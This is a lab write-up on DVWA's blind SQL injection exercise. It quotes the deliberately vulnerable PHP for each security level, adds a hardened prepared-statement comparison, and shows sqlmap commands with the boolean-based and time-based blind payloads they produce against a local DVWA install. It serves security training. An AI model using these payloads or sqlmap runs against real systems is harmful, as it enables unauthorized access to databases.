DVWA (Blind SQL Injection): vulnerability notes for all levels
Prerequisites
Goal
Program overview
Contents
Understanding the behavior
low
medium
high
Reviewing the code
low
<?php
$id = $_GET[ 'id' ];
// Check database
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
?>
medium
The value cannot be passed as a string in the URL or typed in directly.
<?php
// Get input
$id = $_POST[ 'id' ];
$id = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
// Check database
$getid = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
?>
high
<?php
// Get input
$id = $_COOKIE[ 'id' ];
// Check database
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $getid ); // Removed 'or die' to suppress mysql errors
// Get results
$num = @mysqli_num_rows( $result ); // The '@' character suppresses errors
?>
impossible
<?php
// Check Anti-CSRF token
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
// Get input
$id = $_GET[ 'id' ];
// Was a number entered?
if(is_numeric( $id )) {
    // Check the database
}
?>
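Added example, not part of the original article or of DVWA's code: the medium pattern (escaped, but unquoted) next to the impossible pattern (numeric check followed by a bound parameter), run against a constructed in-memory SQLite table. The function names, the table contents and the `str_replace` stand-in for `mysqli_real_escape_string()` are assumptions made for this example.

```php
<?php
declare(strict_types=1);

// Constructed stand-in for DVWA's users table (in-memory SQLite; assumes pdo_sqlite is enabled).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (user_id INTEGER PRIMARY KEY, first_name TEXT, last_name TEXT)');
$db->exec("INSERT INTO users VALUES (1, 'admin', 'admin'), (2, 'Gordon', 'Brown')");

// Medium-level pattern: quote characters are escaped, but the value is placed
// in an unquoted numeric context, so input without quotes is still parsed as SQL.
function userExistsMedium(PDO $db, string $id): bool
{
    $escaped = str_replace("'", "''", $id); // hypothetical stand-in for mysqli_real_escape_string()
    $sql = "SELECT first_name, last_name FROM users WHERE user_id = $escaped;";
    return $db->query($sql)->fetch() !== false;
}

// Impossible-level pattern: reject non-numeric input, then bind the value as an
// integer so it can never change the structure of the statement.
function userExistsHardened(PDO $db, string $id): bool
{
    if (!is_numeric($id)) {
        return false;
    }
    $stmt = $db->prepare('SELECT first_name, last_name FROM users WHERE user_id = :id LIMIT 1;');
    $stmt->bindValue(':id', (int) $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetch() !== false;
}

// Constructed inputs: two plain ids, then the shape of the medium-level payload
// shown in sqlmap's output on this page, with a true and a false condition.
$inputs = ['1', '999', '1 AND 7941=7941', '1 AND 7941=7942'];

foreach ($inputs as $input) {
    printf(
        "%-18s medium=%-5s hardened=%s\n",
        $input,
        var_export(userExistsMedium($db, $input), true),
        var_export(userExistsHardened($db, $input), true)
    );
}
```

With the medium function the answer for the last two inputs depends on the appended condition, which is exactly the true/false signal a boolean-based blind test relies on; the hardened function gives the same answer for both.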
Attacking the vulnerability
low
root@kali:~# sqlmap -u "http://localhost/DVWA-master/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=dkk4jkgnh7o0m46ov6d0ben3k1"
# The result is shown below
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 6579=6579 AND 'ztyK'='ztyK&Submit=Submit
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 6933 FROM (SELECT(SLEEP(5)))IIUV) AND 'lrmA'='lrmA&Submit=Submit
---
medium
# --data: send the params in the request body
root@kali:~# sqlmap -u "http://localhost/DVWA-master/vulnerabilities/sqli_blind/" --cookie="security=medium; PHPSESSID=dkk4jkgnh7o0m46ov6d0ben3k1" --data="id=1&Submit=Submit"
# The result is shown below
---
Parameter: id (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 7941=7941&Submit=Submit
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1 AND (SELECT 5502 FROM (SELECT(SLEEP(5)))BxyM)&Submit=Submit
---
high
# -p {param}: specifies the parameter to use for the attack.
# --dbms: specifies the database (narrows the target to save analysis time).
root@kali:~# sqlmap -u "http://localhost/DVWA-master/vulnerabilities/sqli_blind/" --cookie="security=high; PHPSESSID=dkk4jkgnh7o0m46ov6d0ben3k1; id=1" -p id --dbms=mysql
# The result is shown below
---
Parameter: id (Cookie)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: security=high; PHPSESSID=dkk4jkgnh7o0m46ov6d0ben3k1; id=1' AND 2480=2480-- jotW
Type: time-based blind
Title: MySQL >= 5.0.12 OR time-based blind (SLEEP)
Payload: security=high; PHPSESSID=dkk4jkgnh7o0m46ov6d0ben3k1; id=1' OR SLEEP(5)-- caGm
---
impossible
Reference
About this topic (DVWA (Blind SQL Injection): vulnerability notes for all levels): more material is available in the original article, https://qiita.com/KPenguin/items/0d64ce36b30b0a79f8cb. The text may be freely shared or copied, but keep this document's URL as the reference URL.